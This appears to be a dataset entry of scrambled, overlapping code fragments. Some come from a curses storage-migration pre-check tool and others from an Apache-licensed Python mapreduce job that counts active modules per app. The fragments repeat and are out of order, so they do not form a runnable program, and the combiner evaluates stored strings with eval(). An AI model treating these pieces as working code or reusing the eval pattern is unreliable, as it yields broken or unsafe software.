"= min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len",
"MIGRATION PRE-CHECK\") title_win.border() ### define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display",
"hostgroup ### for serial_nbr in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not box_name in",
"CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1)",
"window heigth and width ### if curses.COLS < 20 or curses.LINES < 20:",
"key == curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE:",
"logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict)",
"xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in",
"== len(self.xpinfo_file_list) - 1: break else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values())",
"[] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] def navigate(self,n): if",
"= self.slice_start + self.slice_len elif n > 0: if self.slice_end - self.position <",
"curses.A_NORMAL line = \"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1] ### only",
"self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else:",
"self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] self.consistent = consistent def navigate(self,n):",
"0 self.selection = selection self.search = search def update(self): \"\"\" update the selection"
] |
[
"KIND, either express or implied. # See the License for the specific language",
"Unless required by applicable law or agreed to in writing, software # distributed",
"_combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s combined: %s', key, combined) yield combined def",
"combined}) if DEBUG: logging.debug('reducer %s: %s', app_id, json_line) yield '%s\\n' % json_line class",
"'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner',",
"2020 Green Valley Belgium NV # # Licensed under the Apache License, Version",
"10 } output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with",
"import logging import time import cloudstorage from mapreduce import mapreduce_pipeline from pipeline import",
"module, count in stats.iteritems(): if module not in combined: combined[module] = count else:",
"%s', redirect_url) return get_server_settings().baseUrl + redirect_url def mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType",
"this file except in compliance with the License. # You may obtain a",
"of dicts with key app_id, value dict of module, amount outputs = self.outputs.default.value",
"timestamp = self.args # list of dicts with key app_id, value dict of",
"from rogerthat.utils import guid, log_offload def start_job(): current_date = datetime.datetime.now() key = 'module_stats_%s_%s'",
"previously_combined_values: %s', key, previously_combined_values) combined = _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s combined:",
"output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app = {} with cloudstorage.open(filename,",
"ANY KIND, either express or implied. # See the License for the specific",
"import pipeline from pipeline.common import List from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from",
"logging.debug('combiner %s combined: %s', key, combined) yield combined def reducer(app_id, values): # type:",
"(str, list[list[str]], list[dict[str, int]]) -> GeneratorType if DEBUG: logging.debug('combiner %s new_values: %s', key,",
"type: (list[list[str]], list[dict[str, int]]) -> dict[str, int] combined = {} for stats in",
"logging.info('reducer values: %s', values) combined = _combine([], values) json_line = json.dumps({'app_id': app_id, 'stats':",
"redirect_url def mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield",
"{ 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec':",
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See",
"logging.info('ModuleStats pipeline url: %s', redirect_url) return get_server_settings().baseUrl + redirect_url def mapper(sln_settings): # type:",
"List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _, timestamp =",
"d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def run(self, output):",
"url: %s', redirect_url) return get_server_settings().baseUrl + redirect_url def mapper(sln_settings): # type: (SolutionSettings) ->",
"IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or",
"return get_server_settings().baseUrl + redirect_url def mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType for service_identity",
"type: (str, list[dict[str, int]]) -> GeneratorType if DEBUG: logging.info('reducer values: %s', values) combined",
"License. # # @@license_version:1.7@@ import datetime import json import logging import time import",
"# list of dicts with key app_id, value dict of module, amount outputs",
"def finalized(self): if self.was_aborted: logging.error('%s was aborted', self, _suppress=False) return logging.info('%s was finished',",
"+= 1 return combined def combiner(key, new_values, previously_combined_values): # type: (str, list[list[str]], list[dict[str,",
"import get_server_settings from rogerthat.utils import guid, log_offload def start_job(): current_date = datetime.datetime.now() key",
"import time import cloudstorage from mapreduce import mapreduce_pipeline from pipeline import pipeline from",
"in stats.iteritems(): if module not in combined: combined[module] = count else: combined[module] +=",
"OF ANY KIND, either express or implied. # See the License for the",
"CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s was aborted', self, _suppress=False) return logging.info('%s was",
"utf-8 -*- # Copyright 2020 Green Valley Belgium NV # # Licensed under",
"eval(v) if isinstance(v, basestring) else v for module in modules: if module not",
"json_line) yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date): #",
"**params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if",
"in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value =",
"import List from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from",
"-> GeneratorType if DEBUG: logging.debug('combiner %s new_values: %s', key, new_values) logging.debug('combiner %s previously_combined_values:",
"# type: (str, list[dict[str, int]]) -> GeneratorType if DEBUG: logging.info('reducer values: %s', values)",
"value dict of module, amount outputs = self.outputs.default.value # type: list[dict[int, int]] for",
"class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date): # type: (str, str, long) ->",
"% json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date): # type: (str, str,",
"# type: (list[list[str]], list[dict[str, int]]) -> dict[str, int] combined = {} for stats",
"stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def",
"else v for module in modules: if module not in combined: combined[module] =",
"'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else 10 } output = yield",
"1 return combined def combiner(key, new_values, previously_combined_values): # type: (str, list[list[str]], list[dict[str, int]])",
"logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def run(self, output): for filename in",
"ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path,",
"combined[module] = count else: combined[module] += count for v in new_values: # mapper",
"run(self, bucket_name, key, current_date): # type: (str, str, long) -> GeneratorType params =",
"get_server_settings from rogerthat.utils import guid, log_offload def start_job(): current_date = datetime.datetime.now() key =",
"not in combined: combined[module] = count else: combined[module] += count for v in",
"def run(self, bucket_name, key, current_date): # type: (str, str, long) -> GeneratorType params",
"ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _,",
"+= count for v in new_values: # mapper returns a string modules =",
"software # distributed under the License is distributed on an \"AS IS\" BASIS,",
"type: (SolutionSettings) -> GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values,",
"key, previously_combined_values) combined = _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s combined: %s', key,",
"# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to",
"} output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline):",
"def run(self, output, current_date): results = [] for filename in output: results.append((yield ProcessFilePipeline(filename)))",
"combiner(key, new_values, previously_combined_values): # type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType if DEBUG:",
"%s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def run(self, output): for filename in output:",
"= 1 else: combined[module] += 1 return combined def combiner(key, new_values, previously_combined_values): #",
"% (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url) return get_server_settings().baseUrl + redirect_url def",
"GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type:",
"coding: utf-8 -*- # Copyright 2020 Green Valley Belgium NV # # Licensed",
"under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES",
"get_server_settings().baseUrl + redirect_url def mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType for service_identity in",
"the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law",
"start_job(): current_date = datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET,",
"{ 'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG",
"output in outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename):",
"get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str, int]]) ->",
"(str, list[dict[str, int]]) -> GeneratorType if DEBUG: logging.info('reducer values: %s', values) combined =",
"= d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def run(self,",
"STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from rogerthat.settings import get_server_settings from rogerthat.utils",
"\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express",
"count for v in new_values: # mapper returns a string modules = eval(v)",
"= yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output)",
"{} with cloudstorage.open(filename, \"r\") as f: for json_line in f: d = json.loads(json_line)",
"as f: for json_line in f: d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if",
"else: combined[module] += 1 return combined def combiner(key, new_values, previously_combined_values): # type: (str,",
"from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from rogerthat.settings import",
"and # limitations under the License. # # @@license_version:1.7@@ import datetime import json",
"DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from rogerthat.settings import get_server_settings from rogerthat.utils import",
"@@license_version:1.7@@ import datetime import json import logging import time import cloudstorage from mapreduce",
"required by applicable law or agreed to in writing, software # distributed under",
"type: (str, str, long) -> GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': {",
"self, _suppress=False) return logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date):",
"int]]) -> GeneratorType if DEBUG: logging.info('reducer values: %s', values) combined = _combine([], values)",
"import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from rogerthat.settings import get_server_settings from",
"# @@license_version:1.7@@ import datetime import json import logging import time import cloudstorage from",
"applicable law or agreed to in writing, software # distributed under the License",
"key, current_date): # type: (str, str, long) -> GeneratorType params = { 'mapper_spec':",
"bucket_name, key, current_date): # type: (str, str, long) -> GeneratorType params = {",
"new_values, previously_combined_values): # type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType if DEBUG: logging.debug('combiner",
"return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url)",
"or agreed to in writing, software # distributed under the License is distributed",
"if self.was_aborted: logging.error('%s was aborted', self, _suppress=False) return logging.info('%s was finished', self) class",
"f: for json_line in f: d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG:",
"rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from rogerthat.settings import get_server_settings",
"-> GeneratorType if DEBUG: logging.info('reducer values: %s', values) combined = _combine([], values) json_line",
"CONDITIONS OF ANY KIND, either express or implied. # See the License for",
"for module in modules: if module not in combined: combined[module] = 1 else:",
"ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app = {} with cloudstorage.open(filename, \"r\") as f: for",
"Belgium NV # # Licensed under the Apache License, Version 2.0 (the \"License\");",
"_suppress=False) return logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results",
"(current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url",
"basestring) else v for module in modules: if module not in combined: combined[module]",
"yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s was aborted', self, _suppress=False) return logging.info('%s",
"{ 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params':",
"pipeline import pipeline from pipeline.common import List from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET",
"under the Apache License, Version 2.0 (the \"License\"); # you may not use",
"'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True)",
"writing, software # distributed under the License is distributed on an \"AS IS\"",
"= json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class",
"'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter',",
"DEBUG: logging.debug('reducer %s: %s', app_id, json_line) yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def",
"current_date): results = [] for filename in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def",
"import datetime import json import logging import time import cloudstorage from mapreduce import",
"= counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url:",
"You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #",
"yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str, int]]) -> dict[str,",
"app_id, json_line) yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date):",
"License. # You may obtain a copy of the License at # #",
"'%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date): # type: (str,",
"from rogerthat.dal.service import get_service_identities from rogerthat.settings import get_server_settings from rogerthat.utils import guid, log_offload",
"process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted:",
"compliance with the License. # You may obtain a copy of the License",
"finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _, timestamp = self.args #",
"list[dict[str, int]]) -> GeneratorType if DEBUG: logging.info('reducer values: %s', values) combined = _combine([],",
"'%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url) return get_server_settings().baseUrl + redirect_url",
"(SolutionSettings) -> GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values):",
"list of dicts with key app_id, value dict of module, amount outputs =",
"task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline",
"aborted', self, _suppress=False) return logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output,",
"results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value)",
"finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results = [] for filename",
"in combined: combined[module] = 1 else: combined[module] += 1 return combined def combiner(key,",
"of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable",
"ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date): # type: (str, str, long) -> GeneratorType",
"language governing permissions and # limitations under the License. # # @@license_version:1.7@@ import",
"self.args # list of dicts with key app_id, value dict of module, amount",
"= {} with cloudstorage.open(filename, \"r\") as f: for json_line in f: d =",
"import cloudstorage from mapreduce import mapreduce_pipeline from pipeline import pipeline from pipeline.common import",
"returns a string modules = eval(v) if isinstance(v, basestring) else v for module",
"= json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG: logging.debug('reducer %s: %s', app_id, json_line) yield",
"logging.error('%s was aborted', self, _suppress=False) return logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def",
"def mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id,",
"logging import time import cloudstorage from mapreduce import mapreduce_pipeline from pipeline import pipeline",
"stats_per_app = {} with cloudstorage.open(filename, \"r\") as f: for json_line in f: d",
"task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url) return",
"combined def reducer(app_id, values): # type: (str, list[dict[str, int]]) -> GeneratorType if DEBUG:",
"not use this file except in compliance with the License. # You may",
"logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results = []",
"datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task",
"module, amount outputs = self.outputs.default.value # type: list[dict[int, int]] for output in outputs:",
"in new_values: # mapper returns a string modules = eval(v) if isinstance(v, basestring)",
"for json_line in f: d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline:",
"if module not in combined: combined[module] = 1 else: combined[module] += 1 return",
"-*- coding: utf-8 -*- # Copyright 2020 Green Valley Belgium NV # #",
"str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str, int]]) -> dict[str, int] combined",
"modules = eval(v) if isinstance(v, basestring) else v for module in modules: if",
"[] for filename in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if DEBUG:",
"pipeline from pipeline.common import List from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service",
"License, Version 2.0 (the \"License\"); # you may not use this file except",
"# # @@license_version:1.7@@ import datetime import json import logging import time import cloudstorage",
"yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date): # type:",
"module not in combined: combined[module] = 1 else: combined[module] += 1 return combined",
"from pipeline import pipeline from pipeline.common import List from rogerthat.consts import STATS_QUEUE, DEBUG,",
"outputs = self.outputs.default.value # type: list[dict[int, int]] for output in outputs: log_offload.create_log(None, 'oca.active_modules',",
"= yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s",
"distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY",
"= _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s combined: %s', key, combined) yield combined",
"int]]) -> GeneratorType if DEBUG: logging.debug('combiner %s new_values: %s', key, new_values) logging.debug('combiner %s",
"from rogerthat.settings import get_server_settings from rogerthat.utils import guid, log_offload def start_job(): current_date =",
"time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats",
"for v in new_values: # mapper returns a string modules = eval(v) if",
"json import logging import time import cloudstorage from mapreduce import mapreduce_pipeline from pipeline",
"previously_combined_values) if DEBUG: logging.debug('combiner %s combined: %s', key, combined) yield combined def reducer(app_id,",
"list[dict[str, int]]) -> dict[str, int] combined = {} for stats in previous_combined_values: for",
"filename in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value",
"if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _, timestamp = self.args # list",
"for output in outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self,",
"int]]) -> dict[str, int] combined = {} for stats in previous_combined_values: for module,",
"current_date): # type: (str, str, long) -> GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper',",
"return combined def combiner(key, new_values, previously_combined_values): # type: (str, list[list[str]], list[dict[str, int]]) ->",
"int] combined = {} for stats in previous_combined_values: for module, count in stats.iteritems():",
"# you may not use this file except in compliance with the License.",
"from pipeline.common import List from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import",
"a string modules = eval(v) if isinstance(v, basestring) else v for module in",
"agreed to in writing, software # distributed under the License is distributed on",
"amount outputs = self.outputs.default.value # type: list[dict[int, int]] for output in outputs: log_offload.create_log(None,",
"service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str,",
"-> dict[str, int] combined = {} for stats in previous_combined_values: for module, count",
"(the \"License\"); # you may not use this file except in compliance with",
"self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results = [] for filename in",
"limitations under the License. # # @@license_version:1.7@@ import datetime import json import logging",
"= count else: combined[module] += count for v in new_values: # mapper returns",
"# Unless required by applicable law or agreed to in writing, software #",
"values: %s', values) combined = _combine([], values) json_line = json.dumps({'app_id': app_id, 'stats': combined})",
"by applicable law or agreed to in writing, software # distributed under the",
"DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _, timestamp = self.args # list of",
"= self.outputs.default.value # type: list[dict[int, int]] for output in outputs: log_offload.create_log(None, 'oca.active_modules', output,",
"<filename>src/solutions/common/job/module_statistics.py # -*- coding: utf-8 -*- # Copyright 2020 Green Valley Belgium NV",
"service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str, int]]) -> dict[str, int]",
"copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by",
"GeneratorType if DEBUG: logging.debug('combiner %s new_values: %s', key, new_values) logging.debug('combiner %s previously_combined_values: %s',",
"'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name':",
"%s new_values: %s', key, new_values) logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values) combined =",
"%s', self.outputs.default.value) _, timestamp = self.args # list of dicts with key app_id,",
"%s', key, combined) yield combined def reducer(app_id, values): # type: (str, list[dict[str, int]])",
"reducer(app_id, values): # type: (str, list[dict[str, int]]) -> GeneratorType if DEBUG: logging.info('reducer values:",
"pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s was aborted', self, _suppress=False) return",
"the License. # # @@license_version:1.7@@ import datetime import json import logging import time",
"Copyright 2020 Green Valley Belgium NV # # Licensed under the Apache License,",
"log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app = {}",
"file except in compliance with the License. # You may obtain a copy",
"count in stats.iteritems(): if module not in combined: combined[module] = count else: combined[module]",
"'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': {",
"counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url) return get_server_settings().baseUrl + redirect_url def mapper(sln_settings): #",
"}, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else 10 } output",
"List from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from rogerthat.settings",
"guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url =",
"if DEBUG: logging.debug('combiner %s combined: %s', key, combined) yield combined def reducer(app_id, values):",
"stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def run(self, output): for filename in output: cloudstorage.delete(filename)",
"filename): stats_per_app = {} with cloudstorage.open(filename, \"r\") as f: for json_line in f:",
"License for the specific language governing permissions and # limitations under the License.",
"-> GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings',",
"to in writing, software # distributed under the License is distributed on an",
"'shards': 2 if DEBUG else 10 } output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline",
"= [] for filename in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if",
"implied. # See the License for the specific language governing permissions and #",
"previously_combined_values) combined = _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s combined: %s', key, combined)",
"\"License\"); # you may not use this file except in compliance with the",
"obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless",
"'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else 10 } output = yield mapreduce_pipeline.MapreducePipeline(key,",
"pipeline.common import List from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities",
"DEBUG: logging.debug('combiner %s combined: %s', key, combined) yield combined def reducer(app_id, values): #",
"%s: %s', app_id, json_line) yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name,",
"finalized(self): if self.was_aborted: logging.error('%s was aborted', self, _suppress=False) return logging.info('%s was finished', self)",
"dicts with key app_id, value dict of module, amount outputs = self.outputs.default.value #",
"for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type: (list[list[str]],",
